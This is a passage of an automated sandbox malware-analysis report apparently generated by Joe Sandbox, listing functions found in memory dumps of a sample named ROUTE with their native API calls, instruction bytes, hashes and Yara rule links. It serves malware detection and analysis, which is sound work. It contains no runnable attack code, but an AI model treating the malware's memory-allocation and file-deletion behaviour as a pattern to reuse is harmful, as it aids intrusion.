                                                                                • Opcode Fuzzy Hash: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                • Instruction Fuzzy Hash: C031C6B9A00248AFDB14DF99D841EEFB7B9EF8C714F108119F918A7341D674A811CFA5
                                                                                Function 02849640 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(02831DAB,?,02847FCE,00000000,635CE8B4,00003000,?,?,?,?,?,02847FCE,02831DAB), ref: 02849708
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                • Instruction ID: 8011ddff1c51fdb6875fc17288d8413022307d9f15bafa35f53709eb7df275b5
                                                                                • Opcode Fuzzy Hash: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                • Instruction Fuzzy Hash: 6C211E79A00249AFDB14DFA8DC41EAFB7B9EF88710F108509F918A7241D670A911CFA5
                                                                                Function 02849430 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                • Instruction ID: 233156cb137534584cfe3951f185f6b6b36f292297dfe4e0887d96c395a92d80
                                                                                • Opcode Fuzzy Hash: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                • Instruction Fuzzy Hash: A911A379900608AFD620EBA8DC01FAF776DDF88710F108509FA18A7281EB7175058FA6
                                                                                Function 028494D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtClose.NTDLL(02841801,?,-665E6599,?,?,02841801,?,00009D57), ref: 02849507
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction ID: 4ec68fd3550e94bda7ad264d9020efab5619e40d6a505bc6cdc1b3876c4ad988
                                                                                • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction Fuzzy Hash: 6CE086392002147BD210EA5DDC40F9B775DDFC9710F51C055FA0CA7242DA71B9158BF5
                                                                                Function 03084340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: dc9d51e29432b38ad2765f8dc8bc1a7e6e1cc56edc9c3b4e80a952548f2beec3
                                                                                • Instruction ID: 3bb344a8f788a989aab2f9ecc85bee02522ee92ee85790cb19070857c8bbec51
                                                                                • Opcode Fuzzy Hash: dc9d51e29432b38ad2765f8dc8bc1a7e6e1cc56edc9c3b4e80a952548f2beec3
                                                                                • Instruction Fuzzy Hash: 9490023160680412B540B1588884546404597E1301B55C012E0828564C8B148A566365
                                                                                Function 03084650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8a0a23dd6afb7af031f808bf2e7e9c01e6a3e9e7c2ce6420726b57defdee1cd6
                                                                                • Instruction ID: 7e49fbb314c9152208f4d2d651c8cee6fac480c9c534f9ac1864d53410aa5847
                                                                                • Opcode Fuzzy Hash: 8a0a23dd6afb7af031f808bf2e7e9c01e6a3e9e7c2ce6420726b57defdee1cd6
                                                                                • Instruction Fuzzy Hash: DB900261602504426540B1588804406604597E2301395C116A0958570C87188955A26D
                                                                                Function 03082B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4a665577726f639a509ec42f816fa1c642ec9556dbd7f2d9b8d3685b14011a98
                                                                                • Instruction ID: d2692d60d4cd52e08e20c902f97685c19698450e3a26c4b2205c27e3885b59d3
                                                                                • Opcode Fuzzy Hash: 4a665577726f639a509ec42f816fa1c642ec9556dbd7f2d9b8d3685b14011a98
                                                                                • Instruction Fuzzy Hash: 16900261203404036505B1588414616404A87E1201B55C022E14185A0DC62589917129
                                                                                Function 03082BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f37638bbc94783c88f3f38dff99808bfe234446e6a4575a7d5c9945c39709d9d
                                                                                • Instruction ID: 6e184c8aba65a86a45c62e5a210a0a05fe2e1c140ddc545354b59370c5ee7c00
                                                                                • Opcode Fuzzy Hash: f37638bbc94783c88f3f38dff99808bfe234446e6a4575a7d5c9945c39709d9d
                                                                                • Instruction Fuzzy Hash: DE90023160640C02F550B1588414746004587D1301F55C012A0428664D87558B5576A5
                                                                                Function 03082BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b8883354e33c458ae731d848dbd767e70d51c27f1d6a55ff65e8e76fac063021
                                                                                • Instruction ID: 646c4fa7089f4cc772e1e4fb01745c27175e373f309af30d9e5ab33aa7d518fc
                                                                                • Opcode Fuzzy Hash: b8883354e33c458ae731d848dbd767e70d51c27f1d6a55ff65e8e76fac063021
                                                                                • Instruction Fuzzy Hash: 4790023120644C42F540B1588404A46005587D1305F55C012A04686A4D97258E55B665
                                                                                Function 03082BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9fb4f8587cae376b7091116dbc46acb7b237a0653affebffa166a60476d4da9b
                                                                                • Instruction ID: 1c684cc4b7a69fea1a1340bb3fb3ff02911dca8d24482b073af57a67d66ed38a
                                                                                • Opcode Fuzzy Hash: 9fb4f8587cae376b7091116dbc46acb7b237a0653affebffa166a60476d4da9b
                                                                                • Instruction Fuzzy Hash: 2E90023120240C02F580B158840464A004587D2301F95C016A0429664DCB158B5977A5
                                                                                Function 03082AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7031ba97afd52de494e9a1f66e1c05d49b1b2ed4bf89f3a0cf70049996fdabf5
                                                                                • Instruction ID: 452ac38ed84634283ae10c09f63a51ea70d1a44ee4b8fb84e8bbf04c5b5ead3c
                                                                                • Opcode Fuzzy Hash: 7031ba97afd52de494e9a1f66e1c05d49b1b2ed4bf89f3a0cf70049996fdabf5
                                                                                • Instruction Fuzzy Hash: 3A900225212404032505F5584704507008687D6351355C022F1419560CD72189616125
                                                                                Function 03082AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: d02cc331e304b10914bf9f47893c9862514c083f6b138ddc06103fd9719ed88d
                                                                                • Instruction ID: dd725b33ca1efd26948c588e603250992806381856618f38e89b09acdb351a10
                                                                                • Opcode Fuzzy Hash: d02cc331e304b10914bf9f47893c9862514c083f6b138ddc06103fd9719ed88d
                                                                                • Instruction Fuzzy Hash: 41900225222404022545F558460450B048597D7351395C016F181A5A0CC72189656325
                                                                                Function 03082F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 857cb886b89aa9a5c50526e18737e0b28ffe602c3943060e65d78f805390e686
                                                                                • Instruction ID: dcb74f944cc962d1b9aa328d8270b118bcbf9fda169beac85f97da6cb8ae3900
                                                                                • Opcode Fuzzy Hash: 857cb886b89aa9a5c50526e18737e0b28ffe602c3943060e65d78f805390e686
                                                                                • Instruction Fuzzy Hash: 5F90026134240842F500B1588414B060045C7E2301F55C016E1468564D8719CD52712A
                                                                                Function 03082FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 648cd47dbb655f483306f9e543e08d5c4fb2615c503914b5504ce7927581976b
                                                                                • Instruction ID: 51f5fffd1f1dad4d4bc2eb10c528b8a5c791e9f987b3b15326877e568b2cbfd1
                                                                                • Opcode Fuzzy Hash: 648cd47dbb655f483306f9e543e08d5c4fb2615c503914b5504ce7927581976b
                                                                                • Instruction Fuzzy Hash: 70900221602404426540B168C8449064045ABE2211755C122A0D9C560D865989656669
                                                                                Function 03082FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 17c69d854d6269fb0f9acac6f6537ae54ba47a286fa18b31e3cc92a6c1ac15e1
                                                                                • Instruction ID: 634fbda9f4199b7ba5693ba49c703eff2572e3d60e4b94d33b59174e416d3dde
                                                                                • Opcode Fuzzy Hash: 17c69d854d6269fb0f9acac6f6537ae54ba47a286fa18b31e3cc92a6c1ac15e1
                                                                                • Instruction Fuzzy Hash: F1900221212C0442F600B5688C14B07004587D1303F55C116A0558564CCA1589616525
                                                                                Function 03082E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ae0efbcf90a4e38347be6e675ac5941d05489cc887f4c8eec1425c701f73f640
                                                                                • Instruction ID: e699461ba57c6a7bb5f1f2d76d908f47c5face148bef44cf3f407811dfb3e6aa
                                                                                • Opcode Fuzzy Hash: ae0efbcf90a4e38347be6e675ac5941d05489cc887f4c8eec1425c701f73f640
                                                                                • Instruction Fuzzy Hash: 2B90022160240902F501B1588404616004A87D1241F95C023A1428565ECB258A92B135
                                                                                Function 03082EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: cae60d21fad9ada50a9845812d70d1ab4c29287f0f2f39e2533fb4134a2f5d1f
                                                                                • Instruction ID: ceef9929952ba932f5cb2d7b618627d1f6e5b8118031ea7e059d918e16da0e1d
                                                                                • Opcode Fuzzy Hash: cae60d21fad9ada50a9845812d70d1ab4c29287f0f2f39e2533fb4134a2f5d1f
                                                                                • Instruction Fuzzy Hash: F490026120280803F540B5588804607004587D1302F55C012A2468565E8B298D517139
                                                                                Function 03082D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: dcb1064a59170bacf996a1958ba66e3f287532552a4e407039af2fe59c7e2176
                                                                                • Instruction ID: 100052d3c28b0fa9b7b37b1990b11b77bf7a5d3d834e0dd6658caaf69d9137dd
                                                                                • Opcode Fuzzy Hash: dcb1064a59170bacf996a1958ba66e3f287532552a4e407039af2fe59c7e2176
                                                                                • Instruction Fuzzy Hash: DA90022921340402F580B158940860A004587D2202F95D416A0419568CCA1589696325
                                                                                Function 03082D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c15c1edf5b9d785afbdce9f1f7ac00775e7740aaa9f53a98f97e770f1f19f0d0
                                                                                • Instruction ID: 60c633c4248b14e851e896c2e20d5dd0f3bc5a3d1429b0991385ced8c3ac8e1c
                                                                                • Opcode Fuzzy Hash: c15c1edf5b9d785afbdce9f1f7ac00775e7740aaa9f53a98f97e770f1f19f0d0
                                                                                • Instruction Fuzzy Hash: 8490022130240403F540B15894186064045D7E2301F55D012E0818564CDA1589566226
                                                                                Function 03082DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 256c05e683f7d2002990e83b29c6427cebb72b597dab495d00fc61c21a0a38cf
                                                                                • Instruction ID: 72325a24eadad66681635e63def9d0a7f4ae04d27221e471bdd0c0233a069e9f
                                                                                • Opcode Fuzzy Hash: 256c05e683f7d2002990e83b29c6427cebb72b597dab495d00fc61c21a0a38cf
                                                                                • Instruction Fuzzy Hash: AB900221243445527945F1588404507404697E1241795C013A1818960C86269956E625
                                                                                Function 03082DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b8b3e2889c1bee6ef68dc53b59368a3b8fe4c0e17b4681ccd3eb71d64ec2a8ab
                                                                                • Instruction ID: 7ba60b2ade53503da8df546aee080b930dc0a2a94a096fe1655a6b492a2c75e6
                                                                                • Opcode Fuzzy Hash: b8b3e2889c1bee6ef68dc53b59368a3b8fe4c0e17b4681ccd3eb71d64ec2a8ab
                                                                                • Instruction Fuzzy Hash: 6690023120240813F511B1588504707004987D1241F95C413A0828568D97568A52B125
                                                                                Function 03082C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2e622b8032220c2f7b94ed087f6111bba51c936df54d6237aaaa21fdaebc5c5c
                                                                                • Instruction ID: c61be46f92d55316239fd3ba37484073c769ea5808c5ff9280ab6e86569b2cbb
                                                                                • Opcode Fuzzy Hash: 2e622b8032220c2f7b94ed087f6111bba51c936df54d6237aaaa21fdaebc5c5c
                                                                                • Instruction Fuzzy Hash: 5C90023120240C42F500B1588404B46004587E1301F55C017A0528664D8715C9517525
                                                                                Function 03082C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5c2a93808a475f7f6a73c4e8d88ecfd1e15b05557bad1322c0c367da7076bbff
                                                                                • Instruction ID: 3a0db6aaf77b64570ed88e34b1d612f7a3fd2cab6aaecf81e587723745b08f32
                                                                                • Opcode Fuzzy Hash: 5c2a93808a475f7f6a73c4e8d88ecfd1e15b05557bad1322c0c367da7076bbff
                                                                                • Instruction Fuzzy Hash: 8890023120248C02F510B158C40474A004587D1301F59C412A4828668D879589917125
                                                                                Function 03082CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
